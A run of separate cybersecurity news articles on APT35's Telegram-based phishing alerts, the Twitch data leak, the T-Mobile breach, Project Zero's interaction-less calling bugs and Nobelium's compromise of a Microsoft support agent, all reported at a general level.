When the Iranian hacking group APT35 wants to know if one of its digital lures has gotten a bite, all it has to do is check Telegram. Whenever someone visits one of the copycat sites they’ve set up, a notification appears in a public channel on the messaging service, detailing the potential victim’s IP address, location, device, browser, and more. It’s not a push notification; it’s a phish notification.
Google’s Threat Analysis Group outlined the novel technique as part of a broader look at APT35, also known as Charming Kitten, a state-sponsored group that has spent the last several years trying to get high-value targets to click on the wrong link and cough up their credentials. And while APT35 isn’t the most successful or sophisticated threat on the international stage—this is the same group, after all, that accidentally leaked hours of videos of themselves hacking—their use of Telegram stands out as an innovative wrinkle that could pay dividends.
The group uses a variety of approaches to try to get people to visit their phishing pages in the first place. Google outlined a few scenarios it has observed lately: the compromise of a UK university website, a fake VPN app that briefly snuck into the Google Play Store, and phishing emails in which the hackers pretend to be organizers of real conferences, and attempt to entrap their marks through malicious PDFs, Dropbox links, websites, and more.
In the case of the university website, the hackers direct potential victims to the compromised page, which encourages them to log in with the service provider of their choice—everything from Gmail to Facebook to AOL is on offer—to view a webinar. If you enter your credentials, they go straight to APT35, which also asks for your two-factor authentication code. It’s a technique so old it’s got whiskers on it; APT35 has been running it since 2017 to target people in government, academia, national security, and more.
The fake VPN isn’t especially innovative, either, and Google says it booted the app from its store before anyone managed to download it. If anyone had fallen for the ruse, though—or does install it on another platform where it’s still available—the spyware can steal call logs, texts, location data, and contacts.
Frankly, APT35 are not exactly overachievers. While they convincingly impersonated officials from the Munich Security conference and Think-20 Italy in recent years, that too is straight out of Phishing 101. “This is a very prolific group that has a wide target set, but that wide target set is not representative of the level of success the actor has,” says Ajax Bash, security engineer at Google TAG. “Their success rate is actually very low.”
This morning, an anonymous hacker released what they claim is an enormous cache of proprietary data from Twitch, the popular streaming platform, including Twitch.tv source code and streamers’ revenue information.
“Jeff Bezos paid $970 million for this, we’re giving it away FOR FREE,” wrote the poster on 4chan. Today’s leak, which its original poster described as “extremely poggers,” is by far the biggest to ever hit Twitch, which was acquired by Amazon in 2014.
The leak, first reported by Video Games Chronicle, reportedly contains 125 GB of data. That data includes the source code for Twitch.tv; Twitch’s mobile, desktop, and game console clients; proprietary SDKs; Twitch-owned properties including Vapor, Amazon’s alleged Steam competitor from Amazon Game Studios; and internal security tools. The leak does not appear to contain streamers’ or users’ personal information, but the damage appears extensive. The post is titled “twitch leaks part one,” implying that there may be more to come.
“Anytime source code gets leaked it’s not good and potentially disastrous,” says Ekram Ahmed, spokesperson at security firm Check Point. “It opens a gigantic door for evildoers to find cracks in the system, lace malware, and potentially steal sensitive information.”
The 4chan poster also referenced Twitch’s recent wave of hate raids, in which botmakers have been spamming marginalized streamers’ chats with bigoted harassment. Mentioning the #DoBetterTwitch hashtag (more commonly #TwitchDoBetter), the poster claimed that Twitch is a “disgusting cesspool.” They wrote that the leak, which appears to contain huge amounts of proprietary data, is to “foster more disruption and competition in the online video game streaming space.” Twitch has introduced several new tools to combat these hate raids, and sued two alleged hate raiders last month.
Twitch declined to comment to WIRED but confirmed Wednesday morning that a breach had taken place. “Our teams are working with urgency to understand the extent of this,” the official Twitch account tweeted. “We will update the community as soon as additional information is available.”
“I wish I could say I’m surprised,” says Avery, a streamer who goes by Littlesiha and does not publicly share her last name for privacy reasons. “It took Twitch two months to find a way to protect marginalized creators that were getting harassed, threatened, and doxed through chatbot raids. Security on the site feels like a joke at this point.”
While much of the data appears to be legitimate, there is some debate over the accuracy of streamers’ revenue numbers. Some streamers have tweeted that their payout numbers are accurate, while others have claimed otherwise. “It was wrong, for my number,” said popular Twitch personality Asmongold while streaming Amazon’s new video game New World this morning. “It’s harder to fuck up more than this,” he told WIRED.
Also streaming on Twitch, Nick “NMP” Polom said, “I kind of feel violated right now.” His viewers, numbering in the tens of thousands, took the leak as an opportunity to meme, donating money attached to messages like “Seems like you need this more than me. I work at McDonald’s.” (On Twitter, he wrote that he is “live right now being relentlessly SHIT ON by my community for being ‘poor.’ THANKS @twitch.”) Although many streamers have expressed deep worry over the leak, some are turning it into a joke: Top streamer Chance “Sodapoppin” Morris, who was 42nd in the streamer revenue number list, begged his viewers not to view it as real: “I swear I’m one of the richest ones on the platform,” he joked. “I make WAY more than that.” (For many top streamers, Twitch payouts are just one revenue stream among many.) Streaming on Twitch, Felix “xQc” Lengyel shouted, “I told y’all—it’s trillionaire with a fucking ‘T’!”
Not all data breaches are created equal. None of them are good, but they do come in varying degrees of bad. And given how regularly they happen, it’s understandable that you may have become inured to the news. Still, a T-Mobile breach that hackers claim involved the data of 100 million people deserves your attention, especially if you’re a customer of the “un-carrier.”
As first reported by Motherboard on Sunday, someone on the dark web claims to have obtained the data of 100 million from T-Mobile’s servers and is selling a portion of it on an underground forum for 6 bitcoin, about $280,000. The trove includes not only names, phone numbers, and physical addresses but also more sensitive data like social security numbers, driver’s license information, and IMEI numbers, unique identifiers tied to each mobile device. Motherboard confirmed that samples of the data “contained accurate information on T-Mobile customers.”
A lot of that information is already widely available, even the social security numbers, which can be found on any number of public records sites. There’s also the reality that most people’s data has been leaked at some point or another. But the apparent T-Mobile breach offers potential buyers a blend of data that could be used to great effect, and not in ways you might automatically assume.
“This is ripe for using the phone numbers and names to send out SMS-based phishing messages that are crafted in a way that’s a little bit more believable,” says Crane Hassold, director of threat intelligence at email security company Abnormal Security. “That’s the first thing that I thought of, looking at this.”
Yes, names and phone numbers are relatively easy to find. But a database that ties those two together, along with identifying someone’s carrier and fixed address, makes it much easier to convince someone to click on a link that advertises, say, a special offer or upgrade for T-Mobile customers. And to do so en masse.
The same is true for identity theft. Again, a lot of the T-Mobile data is out there already in various forms across various breaches. But having it centralized streamlines the process for criminals—or for someone with a grudge, or a specific high-value victim in mind, says Abigail Showman, team lead at risk intelligence firm Flashpoint.
And while names and addresses may be fairly common grist at this point, International Mobile Equipment Identity numbers are not. Because each IMEI number is tied to a specific customer’s phone, knowing it could help in a so-called SIM-swap attack. “This could lead to account takeover concerns,” Showman says, “since threat actors could gain access to two-factor authentication or one-time passwords tied to other accounts—such as email, banking, or any other account employing advanced authentication security feature—using a victim’s phone number.”
That’s not a hypothetical concern; SIM-swap attacks have run rampant over the past several years, and a previous breach, which T-Mobile disclosed in February, was used specifically to execute them.
T-Mobile confirmed on Monday that a breach had occurred but not whether customer data had been compromised. “We have been working around the clock to investigate claims being made that T-Mobile data may have been illegally accessed,” the company said in an emailed statement. “We have determined that unauthorized access to some T-Mobile data occurred, however we have not yet determined that there is any personal customer data involved. We are confident that the entry point used to gain access has been closed, and we are continuing our deep technical review of the situation across our systems to identify the nature of any data that was illegally accessed.”
In early 2019, a bug in group FaceTime calls would have let attackers activate the microphone, and even the camera, of the iPhone they were calling and eavesdrop before the recipient did anything at all. The implications were so severe that Apple invoked a nuclear option, cutting off access to the group-calling feature entirely until the company could issue a fix. The vulnerability—and the fact that it required no taps or clicks at all on the part of the victim—captivated Natalie Silvanovich.
“The idea that you could find a bug where the impact is, you can cause a call to be answered without any interaction—that’s surprising,” says Silvanovich, a researcher in Google’s Project Zero bug-hunting team. “I went on a bit of a tear and tried to find these vulnerabilities in other applications. And I ended up finding quite a few.”
Silvanovich has spent years studying “interaction-less” vulnerabilities, hacks that don’t require their targets to click a malicious link, download an attachment, enter a password in the wrong place, or participate in any way. Those attacks have taken on increasing significance as targeted mobile surveillance explodes around the world.
At the Black Hat security conference in Las Vegas on Thursday, Silvanovich is presenting her findings about remote eavesdropping bugs in ubiquitous communication apps like Signal, Google Duo, and Facebook Messenger, as well as popular international platforms JioChat and Viettel Mocha. All of the bugs have been patched, and Silvanovich says that the developers were extremely responsive about fixing the vulnerabilities within days or a few weeks of her disclosures. But the sheer number of discoveries in mainstream services underscores how common these flaws can be and the need for developers to take them seriously.
“When I heard about that group FaceTime bug I thought it was a unique bug that would never occur again, but that turned out not to be true,” says Silvanovich. “This is something we didn’t know about before, but it’s important now for the people who make communication apps to be aware. You’re making a promise to your users that you’re not going to suddenly start transmitting audio or video of them at any time, and it’s your burden to make sure that your application lives up to that.”
The vulnerabilities Silvanovich found offered an assortment of eavesdropping options. The Facebook Messenger bug could have allowed an attacker to listen in on audio from a target’s device. The Viettel Mocha and JioChat bugs both potentially gave advanced access to audio and video. The Signal flaw exposed audio only. And the Google Duo vulnerability gave video access, but only for a few seconds. During this time an attacker could still record a few frames or grab screenshots.
The apps Silvanovich looked at all build much of their audio and video calling infrastructure on real-time communication tools from the open source project WebRTC. Some of the interaction-less calling vulnerabilities stemmed from developers who seemingly misunderstood WebRTC features, or implemented them poorly. But Silvanovich says that other flaws came from design decisions specific to each service related to when and how it sets up calls.
When someone calls you on an internet-based communication app, the system can start setting up the connection between your devices right away, a process known as “establishment,” so the call can start instantly when you hit accept. Another option is for the app to hang back a bit, wait to see if you accept the call, and then take a couple of seconds to establish the communication channel once it knows your preference.
The nation-state hackers who orchestrated the SolarWinds supply chain attack compromised a Microsoft worker’s computer and used the access to launch targeted attacks against company customers, Microsoft said in a terse statement published late on a Friday afternoon.
The hacking group also compromised three entities using password-spraying and brute-force techniques, which gain unauthorized access to accounts by bombarding login servers with large numbers of login guesses. With the exception of the three undisclosed entities, Microsoft said, the password-spraying campaign was “mostly unsuccessful.” Microsoft has since notified all targets, whether attacks were successful or not.
The discoveries came in Microsoft’s continued investigation into Nobelium, Microsoft’s name for the sophisticated hacking group that used SolarWinds software updates and other means to compromise networks belonging to nine US agencies and 100 private companies. The federal government has said Nobelium is part of the Russian government’s Federal Security Service.
“As part of our investigation into this ongoing activity, we also detected information-stealing malware on a machine belonging to one of our customer support agents with access to basic account information for a small number of our customers,” Microsoft said in a post. “The actor used this information in some cases to launch highly targeted attacks as part of their broader campaign.”
According to Reuters, Microsoft published the breach disclosure after one of the news outlet’s reporters asked the company about the notification it sent to targeted or hacked customers. Microsoft didn’t reveal the infection of the worker’s computer until the fourth paragraph of the five-paragraph post.
The infected agent, Reuters said, could access billing contact information and the services the customers paid for, among other things. “Microsoft warned affected customers to be careful about communications to their billing contacts and consider changing those usernames and email addresses, as well as barring old usernames from logging in,” the news service reported.
The supply chain attack on SolarWinds came to light in December. After hacking the Austin, Texas-based company and taking control of its software-build system, Nobelium pushed malicious updates to about 18,000 SolarWinds customers.
“The latest cyberattack reported by Microsoft does not involve our company or our customers in any way,” a SolarWinds representative said in an email.
The SolarWinds supply chain attack wasn’t the only way Nobelium compromised its targets. Anti-malware provider Malwarebytes has said it was also infected by Nobelium but through a different vector, which the company didn’t identify.
Both Microsoft and email management provider Mimecast have also said that they, too, were hacked by Nobelium, which then went on to use the compromises to hack the companies’ customers or partners.
Microsoft said that the password-spraying activity targeted specific customers, with 57 percent of them IT companies, 20 percent government organizations, and the rest nongovernmental organizations, think tanks, and financial services. About 45 percent of the activity focused on US interests, 10 percent targeted UK customers, and smaller numbers were in Germany and Canada. In all, customers in 36 countries were targeted.
Reuters, citing a Microsoft spokesman, said that the breach disclosed Friday wasn’t part of Nobelium’s previous successful attack on Microsoft. The company has yet to provide key details, including how long the agent’s computer was compromised and whether the compromise hit a Microsoft-managed machine on a Microsoft network or a contractor device on a home network.
Friday’s disclosure came as a shock to many security analysts.
“I mean, Jesus, if Microsoft can’t keep their own kit clear of viruses, how is the rest of the corporate world supposed to?” Kenn White, an independent security researcher, told me. “You would have thought that customer-facing systems would be some of the most hardened around.”